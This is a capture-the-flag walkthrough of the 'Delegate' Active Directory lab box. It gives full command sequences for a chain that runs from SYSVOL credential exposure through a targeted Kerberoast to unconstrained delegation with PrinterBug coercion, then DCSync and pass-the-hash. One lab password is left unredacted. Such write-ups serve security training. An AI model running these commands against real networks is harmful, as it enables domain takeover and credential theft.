Delegate
A guest SMB session reads a logon script left on SYSVOL that leaks a domain password; GenericWrite enables a targeted Kerberoast for WinRM access; unconstrained delegation with PrinterBug coercion captures the DC's TGT for a full DCSync.
Overview
Delegate is a medium-difficulty Windows Active Directory box that walks a realistic three-phase AD attack chain. The foothold is a classic information-disclosure: a near-anonymous guest SMB session can browse SYSVOL, where a logon batch script was left with a password hard-coded in it. That account holds a dangerous ACL — GenericWrite — over a second user, which enables a targeted Kerberoast: plant a fake SPN, crack the ticket offline, log in over WinRM. The final phase chains unconstrained delegation together with the PrinterBug coercion: N.Thompson can set a computer TRUSTED_FOR_DELEGATION, coerce the DC into authenticating to it, capture the DC’s TGT with krbrelayx, and DCSync the Administrator hash.
Machine Matrix
Realistic AD chain: guest SMB reads a SYSVOL script leaking a password, GenericWrite enables a targeted Kerberoast for WinRM, and unconstrained delegation plus PrinterBug coercion captures the DC’s TGT for DCSync. No CVE — BloodHound, impacket, and krbrelayx throughout.
Recon
1
nmap -sVC 10.129.234.69
| Port | Service |
|---|---|
| 53 | DNS |
| 88 | Kerberos |
| 135 / 139 / 445 | RPC / NetBIOS / SMB |
| 389 / 636 / 3268 / 3269 | LDAP / LDAPS / Global Catalog |
| 464 | kpasswd |
| 5985 | WinRM |
| 9389 | ADWS |
The port profile is a textbook Domain Controller. The domain is delegate.vl and the DC is DC1.delegate.vl — add both to /etc/hosts:
1
echo "10.129.234.69 dc1.delegate.vl delegate.vl DC1" | sudo tee -a /etc/hosts
With a DC and no web surface, the first move is to see how much an unauthenticated/guest session can read over SMB.
Enumeration
The guest account is enabled and can list shares:
1
nxc smb 10.129.234.69 -u guest -p '' --shares
SYSVOL is readable. SYSVOL is replicated to every domain controller and is readable by all domain principals — it is meant for logon scripts and policy, never secrets. Spider it for scripts:
1
smbclient //10.129.234.69/SYSVOL -N -c "recurse; ls" 2>/dev/null | grep -iE '\.bat|\.ps1'
1
2
3
cd delegate.vl\scripts\
wget users.bat
yes
A batch script in the scripts folder contains a plaintext credential for the domain user A.Briggs. Here is the foothold. With a valid domain user, collect the AD graph and look for attack paths:
1
rusthound-ce --domain delegate.vl -u A.Briggs -p '<REDACTED>' --zip
BloodHound shows A.Briggs has GenericWrite over the user N.Thompson. GenericWrite lets you write object attributes — including servicePrincipalName.
Foothold — Targeted Kerberoast
Any account that has an SPN is Kerberoastable: anyone can request a service ticket for it, and that ticket is encrypted with the account’s password hash, crackable offline. A.Briggs cannot read N.Thompson’s password directly, but with GenericWrite it can temporarily plant a fake SPN on N.Thompson, roast it, then clean up — a targeted Kerberoast.
Plant a fake SPN, request the ticket, and remove the SPN afterward:
1
nxc ldap 10.129.234.69 -u A.Briggs -p '<REDACTED>' --kerberoast nt.hash
Crack the roasted ticket (Kerberos 5 TGS-REP, hashcat mode 13100) against rockyou:
1
hashcat -m 13100 nt.hash /usr/share/wordlists/rockyou.txt
The password cracks quickly. N.Thompson is a member of Remote Management Users, so the credential is directly usable over WinRM:
1
evil-winrm -i 10.129.234.69 -u N.Thompson -p '<REDACTED>'
User flag
1
type C:\Users\N.Thompson\Desktop\user.txt
Privilege Escalation — Unconstrained Delegation + PrinterBug
BloodHound reveals that N.Thompson is a member of delegation admins, a group that effectively grants SeEnableDelegationPrivilege — the right to mark accounts trusted for delegation. The domain also has a non-zero Machine Account Quota, so any domain user can create computer accounts. Those two facts together enable an unconstrained-delegation attack.
How unconstrained delegation works: A computer flagged TRUSTED_FOR_DELEGATION receives a copy of the caller’s TGT whenever someone authenticates to it via Kerberos. If we can coerce a privileged account — like the DC itself — into authenticating to our fake machine, we capture that TGT. A DC’s TGT can request replication permissions and perform a DCSync.
Step 1 — Create a computer and flag it for unconstrained delegation
1
2
bloodyAD -d delegate.vl -u N.Thompson -p 'KALEB_2341' --host dc1.delegate.vl --dc-ip 10.129.234.69 add computer fakedf 'FakeP@ss123!'
bloodyAD -d delegate.vl -u N.Thompson -p 'KALEB_2341' --host dc1.delegate.vl --dc-ip 10.129.234.69 add uac 'fakedf$' -f TRUSTED_FOR_DELEGATION
Compute the NT hash of the computer account password (needed by krbrelayx to decrypt incoming tickets):
1
python3 -c "import hashlib;print(hashlib.new('md4','FakeP@ss123!'.encode('utf-16-le')).hexdigest())"
Step 2 — Add a DNS record pointing the fake computer at the attacker
krbrelayx’s dnstool.py adds an A record for fakedf.delegate.vl pointing to the attacker machine, so coerced Kerberos tickets are sent here:
1
PYTHONNOUSERSITE=1 python3 ~/Downloads/Tools/krbrelayx/dnstool.py -u 'delegate.vl\N.Thompson' -p '<REDACTED>' --action add --record fakedf.delegate.vl --data 10.10.16.13 --type A 10.129.234.69
Step 3 — Start krbrelayx and coerce the DC
Start krbrelayx with the computer’s NT hash so it can decrypt incoming tickets. The < <(sleep 900) keeps stdin open so the listener does not exit when backgrounded:
1
2
sudo PYTHONNOUSERSITE=1 python3 ~/Downloads/Tools/krbrelayx/krbrelayx.py \
-hashes :<fakedf_nthash> < <(sleep 900)
Then trigger the DC’s Print Spooler to authenticate to fakedf.delegate.vl (PrinterBug / MS-RPRN):
1
2
PYTHONNOUSERSITE=1 python3 ~/Downloads/Tools/krbrelayx/printerbug.py \
'delegate.vl/N.Thompson:<REDACTED>@10.129.234.69' fakedf.delegate.vl
krbrelayx captures DC1$’s TGT and saves it as a .ccache file.
Step 4 — DCSync
Use the captured DC ticket to perform directory replication and dump the Administrator hash:
1
2
KRB5CCNAME='[email protected][email protected]' \
impacket-secretsdump -k -no-pass -just-dc-user Administrator dc1.delegate.vl
Step 5 — Pass-the-hash to Administrator
1
evil-winrm -i 10.129.234.69 -u Administrator -H <redacted>
Root flag
1
type C:\Users\Administrator\Desktop\root.txt
Full domain compromise achieved via SYSVOL credential exposure → targeted Kerberoast → unconstrained delegation + PrinterBug coercion → DCSync.









